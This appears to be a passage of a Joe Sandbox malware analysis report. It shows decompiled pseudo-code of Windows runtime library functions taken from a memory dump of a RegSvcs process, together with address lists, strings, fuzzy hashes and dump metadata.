													L018FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E018FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E018FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E018FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E018FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E018FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x19b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x19b7b84 = _t75;
						_t73 = E018DEB70(_t134, 0x19b7b60);
						if( *0x19b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E018DFF60( *0x19b7b20);
							}
						}
						goto L5;
					}
				}
			}

0x018ffab0
0x018ffab2
0x018ffab3
0x018ffab4
0x018ffabc
0x018ffac0
0x018ffb14
0x018ffb17
0x018ffac2
0x018ffac8
0x018ffacd
0x018ffad3
0x018ffad3
0x018ffadd
0x018ffb18
0x018ffb1b
0x018ffb1d
0x018ffb1e
0x018ffb1f
0x018ffb20
0x018ffb21
0x018ffb22
0x018ffb23
0x018ffb24
0x018ffb25
0x018ffb26
0x018ffb27
0x018ffb28
0x018ffb29
0x018ffb2a
0x018ffb2b
0x018ffb2c
0x018ffb2d
0x018ffb2e
0x018ffb2f
0x018ffb3a
0x018ffb3b
0x018ffb3e
0x018ffb41
0x018ffb44
0x018ffb47
0x018ffb4a
0x018ffb4d
0x018ffb53
0x0193bdcb
0x0193bdcb
0x018ffb59
0x018ffb5b
0x018ffb5b
0x018ffb5e
0x0193bdd5
0x0193bdd8
0x00000000
0x0193bdda
0x00000000
0x0193bdda
0x018ffb64
0x018ffb64
0x018ffb64
0x018ffb67
0x018ffb6e
0x018ffb70
0x018ffb72
0x00000000
0x018ffb78
0x018ffb7a
0x018ffb7a
0x018ffb7d
0x018ffb80
0x0193bddf
0x0193bde1
0x00000000
0x0193bde3
0x00000000
0x0193bde3
0x018ffb86
0x018ffb86
0x018ffb86
0x018ffb8b
0x018ffb90
0x018ffb92
0x018ffb94
0x018ffb9a
0x018ffb9b
0x018ffba1
0x0193bde8
0x0193bdeb
0x0193bded
0x0193beb5
0x0193beb5
0x0193bebb
0x0193bebd
0x0193bec3
0x0193bed2
0x0193bedd
0x0193bedd
0x0193beed
0x00000000
0x0193bdf3
0x0193bdfe
0x0193be06
0x0193be0b
0x0193be0d
0x0193be0f
0x0193be14
0x0193be19
0x0193be20
0x0193be25
0x0193be27
0x0193be35
0x0193be39
0x0193be46
0x0193be4f
0x0193be54
0x0193be56
0x0193bef8
0x0193bef8
0x00000000
0x0193be5c
0x0193be5c
0x0193be60
0x00000000
0x0193be66
0x0193be66
0x0193be7f
0x0193be84
0x0193be87
0x0193be89
0x0193be8b
0x0193be99
0x0193be9d
0x0193bea0
0x0193beac
0x0193beaf
0x0193beb1
0x0193beb3
0x0193beb3
0x00000000
0x0193bea2
0x0193bea2
0x00000000
0x0193bea2
0x0193be8d
0x0193be8d
0x0193be92
0x00000000
0x0193be92
0x0193be8b
0x0193be60
0x0193be3b
0x0193be3b
0x0193be3e
0x00000000
0x0193be40
0x0193be40
0x0193be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0193be44
0x0193be3e
0x0193be29
0x0193be29
0x00000000
0x0193be29
0x0193be27
0x00000000
0x018ffba7
0x018ffba7
0x018ffbab
0x0193bf02
0x018ffbb1
0x018ffbb1
0x018ffbb8
0x018ffbbd
0x018ffbbd
0x018ffbbf
0x018ffbbf
0x018ffbc5
0x018ffbcb
0x018ffbf8
0x018ffbf8
0x018ffbfa
0x00000000
0x018ffc00
0x018ffc00
0x018ffc03
0x00000000
0x018ffc09
0x018ffc09
0x018ffc0f
0x018ffc15
0x018ffc23
0x018ffc23
0x018ffc25
0x018ffc27
0x018ffc75
0x018ffc7c
0x018ffc84
0x00000000
0x018ffc29
0x018ffc29
0x018ffc2d
0x018ffc30
0x0193bf0f
0x00000000
0x018ffc36
0x018ffc38
0x018ffc3b
0x018ffc41
0x0193bf17
0x0193bf19
0x0193bf48
0x0193bf4b
0x00000000
0x0193bf1b
0x0193bf22
0x0193bf24
0x0193bf26
0x00000000
0x0193bf2c
0x0193bf37
0x0193bf39
0x0193bf3b
0x00000000
0x0193bf41
0x0193bf41
0x0193bf41
0x0193bf41
0x0193bf45
0x00000000
0x0193bf45
0x0193bf3b
0x0193bf26
0x00000000
0x018ffc47
0x018ffc47
0x018ffc49
0x018ffcb2
0x018ffcb4
0x018ffcb6
0x018ffcdc
0x018ffcdc
0x00000000
0x018ffcb8
0x018ffcc3
0x018ffcc5
0x018ffcc7
0x00000000
0x018ffcc9
0x018ffcc9
0x018ffccd
0x00000000
0x018ffccd
0x018ffcc7
0x00000000
0x018ffc4b
0x018ffc4b
0x018ffc4e
0x018ffc4e
0x018ffc51
0x018ffc51
0x018ffc54
0x018ffc5a
0x018ffc5c
0x018ffc5f
0x018ffc61
0x018ffc63
0x018ffc65
0x018ffc67
0x018ffc6e
0x018ffc72
0x018ffc72
0x018ffc72
0x018ffc72
0x018ffc67
0x018ffc61
0x00000000
0x018ffc5a
0x018ffc49
0x018ffc41
0x018ffc30
0x018ffc27
0x018ffc03
0x018ffbcd
0x018ffbd3
0x018ffbd9
0x018ffbdc
0x018ffbde
0x018ffc99
0x018ffc9b
0x018ffc9d
0x018ffcd5
0x018ffcd5
0x018ffc89
0x018ffc89
0x00000000
0x018ffc9f
0x018ffc9f
0x018ffca3
0x00000000
0x018ffca3
0x00000000
0x018ffbe4
0x018ffbe4
0x018ffbe4
0x018ffbe4
0x018ffbe9
0x018ffbf2
0x00000000
0x018ffbf2
0x018ffbde
0x018ffbcb
0x018ffbab
0x018ffc8b
0x018ffc8b
0x018ffc8c
0x018ffb80
0x018ffb72
0x018ffb5e
0x018ffc8d
0x018ffc91
0x018ffadf
0x018ffadf
0x018ffae1
0x018ffae4
0x018ffae7
0x018ffaec
0x018ffaf8
0x018ffb00
0x018ffb07
0x018ffb0f
0x018ffb0f
0x018ffb07
0x00000000
0x018ffaf8
0x018ffadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0193BE0F

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 4781463e68b8ee1875483ac1a9fdb0f21b958ea9f1fdc75cc99b2bdc9174a89b
Instruction ID: 6f864c2f8b8fa511210bb85733a963eb301327f4ad69c75ecf87d5b9c96253c6
Opcode Fuzzy Hash: 4781463e68b8ee1875483ac1a9fdb0f21b958ea9f1fdc75cc99b2bdc9174a89b
Instruction Fuzzy Hash: B9A12572B0072A8BEB35DF6CC45077AB7A8AF84715F04456DEB1ACB680DB34DA01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 018C2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E018C2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x19b5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x19b7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E019097C0();
				}
				if( *0x19b79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19b79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E018F1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E018E7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0195FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01909520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E018FE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E0191DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x19b6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x19b6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01909980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E019095D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E018E7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E018E7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01947016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0195FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x19b5350;
							if(_t109 != 0x19b5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0195FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01955720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x018c2d8a
0x018c2d8a
0x018c2d92
0x018c2d96
0x018c2d9e
0x018c2da0
0x018c2da3
0x018c2da5
0x018c2da8
0x018c2dab
0x018c2db2
0x0191f9aa
0x0191f9ab
0x0191f9ae
0x0191f9ae
0x018c2db8
0x018c2dc2
0x0191f9b9
0x0191f9be
0x0191f9bf
0x0191f9bf
0x018c2dcf
0x0191f9c9
0x018c2dd5
0x018c2dd5
0x018c2dd5
0x018c2dde
0x018c2de1
0x018c2e70
0x018c2e72
0x018c2e72
0x018c2de7
0x018c2deb
0x018c2e7c
0x018c2e83
0x018c2e85
0x018c2e8b
0x018c2e8d
0x018c2e92
0x018c2e92
0x018c2e85
0x018c2df1
0x018c2df7
0x018c2df9
0x018c2df9
0x018c2dfc
0x018c2dff
0x018c2e02
0x00000000
0x018c2e05
0x018c2e0c
0x0191f9d9
0x018c2e12
0x018c2e12
0x018c2e12
0x018c2e1a
0x0191f9e3
0x0191f9e9
0x0191f9f0
0x0191f9f6
0x0191f9f8
0x0191f9f8
0x0191f9f0
0x018c2e23
0x0191fa02
0x0191fa03
0x0191fa05
0x0191fa06
0x00000000
0x018c2e29
0x018c2e29
0x018c2e2e
0x018c2e34
0x018c2e3e
0x00000000
0x00000000
0x018c2e44
0x018c2e47
0x018c2e4d
0x00000000
0x00000000
0x018c2e4f
0x018c2e54
0x00000000
0x00000000
0x018c2e5a
0x018c2e5f
0x018c2e9a
0x018c2ea4
0x018c2ea5
0x018c2ea8
0x018c2eaf
0x018c2eb2
0x018c2eb5
0x0191fae9
0x0191faeb
0x0191faed
0x0191faef
0x0191faf7
0x0191faf8
0x0191fafd
0x0191faff
0x0191fb04
0x0191fb04
0x0191faff
0x018c2ec0
0x018c2ec4
0x018c2ec6
0x018c2ec8
0x0191fb14
0x0191fb18
0x0191fb1e
0x0191fb21
0x0191fb21
0x018c2ece
0x018c2ece
0x018c2ece
0x018c2ed7
0x018c2e61
0x018c2e63
0x0191fa6b
0x0191fa71
0x0191fa76
0x0191fa78
0x0191fa8a
0x0191fa7a
0x0191fa83
0x0191fa83
0x0191fa8f
0x0191fa91
0x0191fa97
0x0191fa9d
0x0191faa4
0x0191faaa
0x0191faaf
0x0191fab1
0x0191fac3
0x0191fab3
0x0191fabc
0x0191fabc
0x0191fac8
0x0191facb
0x0191fadf
0x0191fadf
0x0191facb
0x0191faa4
0x0191fa91
0x018c2e6f
0x018c2e6f
0x018c2e5f
0x0191fa13
0x0191fa15
0x0191fa17
0x0191fa1f
0x0191fa21
0x0191fa22
0x0191fa25
0x0191fa28
0x0191fa2f
0x0191fa2f
0x0191fa2a
0x0191fa2a
0x0191fa2a
0x0191fa31
0x0191fa34
0x0191fa36
0x0191fa3c
0x0191fa3e
0x0191fa41
0x0191fa43
0x0191fa45
0x0191fa45
0x0191fa41
0x0191fa3c
0x0191fa4a
0x0191fa4f
0x0191fa51
0x0191fa53
0x0191fa56
0x0191fa5b
0x0191fa5e
0x00000000
0x0191fa5e
0x018c2e23

Strings

RTL: Re-Waiting, xrefs: 0191FA4A

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: a194cd58c6587820e3058ed25e87884ccbd11149f5ec156b645c41f9f6b3c34e
Instruction ID: 5ef3fd78c3aed503a671e7697d7d533c223cd7bb6baed053cda946f0e42f298e
Opcode Fuzzy Hash: a194cd58c6587820e3058ed25e87884ccbd11149f5ec156b645c41f9f6b3c34e
Instruction Fuzzy Hash: A9613831A0064D9FEB32DB6CC880B7E7BEAEB40B14F140659D919E72C2D734DA84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01990EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01990EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0198FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01991074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01909730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0198A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0198A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x19b8b04 >> 0x14) + (_v44 -  *0x19b8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E018E7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0198138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E018E7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0197FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x19b8724 & 0x00000008) != 0) {
						E019852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E019915B5(0x19b8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01990eb7
0x01990eb9
0x01990ec0
0x01990ec2
0x01990ecd
0x0199105b
0x0199105b
0x01991061
0x01991066
0x01991066
0x0199106b
0x01991073
0x01991073
0x01990ed3
0x01990ed6
0x01990edc
0x01990ee0
0x01990ee7
0x01990ef0
0x01990ef5
0x01990efa
0x01990efc
0x01990efd
0x01990f03
0x01990f04
0x01990f06
0x01990f07
0x01990f09
0x01990f0e
0x01990f14
0x01990f23
0x01990f2d
0x01990f34
0x01990f34
0x01990f14
0x01990f52
0x00000000
0x00000000
0x01990f58
0x01990f73
0x01990f74
0x01990f79
0x01990f7d
0x01990f80
0x01990f86
0x01990fab
0x01990fb5
0x01990fc6
0x01990fd1
0x01990fe3
0x01990fd3
0x01990fdc
0x01990fdc
0x01990feb
0x01991009
0x01991009
0x01991015
0x01991027
0x01991017
0x01991020
0x01991020
0x0199102f
0x0199103c
0x0199103c
0x01991048
0x01991050
0x01991050
0x01991055
0x00000000
0x01991055
0x01990f88
0x01990f9e
0x01990fa2
0x01990fa9
0x00000000
0x00000000
0x00000000
0x01990fa9
0x00000000

Strings

`, xrefs: 01990F16

Memory Dump Source

Source File: 00000008.00000002.357578036.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: true

Associated: 00000008.00000002.359332215.00000000019BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.359384313.00000000019BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_18a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 37c0b944ba8cf856c5d8d7c6da48a52b676671158aeb0e96ef8c775ab876fb66
Instruction ID: d8dc710cef9ca9d64d72c4d12a5767e4f45426b3c659a3c87862463a301172b2
Opcode Fuzzy Hash: 37c0b944ba8cf856c5d8d7c6da48a52b676671158aeb0e96ef8c775ab876fb66
Instruction Fuzzy Hash: 37517C713043429BEB25DF2CD984B1BBBE9BBC4714F08092DFA9A97290D671E905C762

Uniqueness

Uniqueness Score: -1.00%

Function 018FF0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E018FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E018E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01909830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01909990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E019095D0();
							goto L11;
						} else {
							_t109 = L018E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0190F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E019095D0();
										L018E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x018ff0d3
0x018ff0d9
0x018ff0e0
0x018ff0e7
0x018ff0f2
0x018ff0f4
0x018ff0f8
0x018ff100
0x018ff108
0x018ff10d
0x018ff115
0x018ff116
0x018ff11f
0x018ff123
0x018ff124
0x018ff12c
0x018ff130
0x018ff134
0x018ff13d
0x018ff144
0x018ff14b
0x018ff152
0x0193bab0
0x0193bab0
0x018ff158
0x018ff158
0x018ff15a
0x018ff160
0x018ff165
0x018ff166
0x018ff16f
0x018ff173
0x0193baa7
0x0193baa7
0x0193baab
0x00000000
0x018ff179
0x018ff18d
0x018ff191
0x0193baa2
0x00000000
0x018ff197
0x018ff19b
0x018ff1a2
0x018ff1a9
0x018ff1af
0x018ff1b2
0x018ff1b6
0x018ff1b9
0x018ff1c4
0x018ff1d8
0x018ff1df
0x018ff1e3
0x018ff1eb
0x018ff1ee
0x018ff1f4
0x018ff20f
0x0193bab7
0x0193babb
0x0193bacc
0x0193bad1
0x018ff215
0x018ff218
0x018ff226
0x018ff22b
0x00000000
0x018ff22b
0x018ff1f6
0x018ff1f6
0x018ff1f9
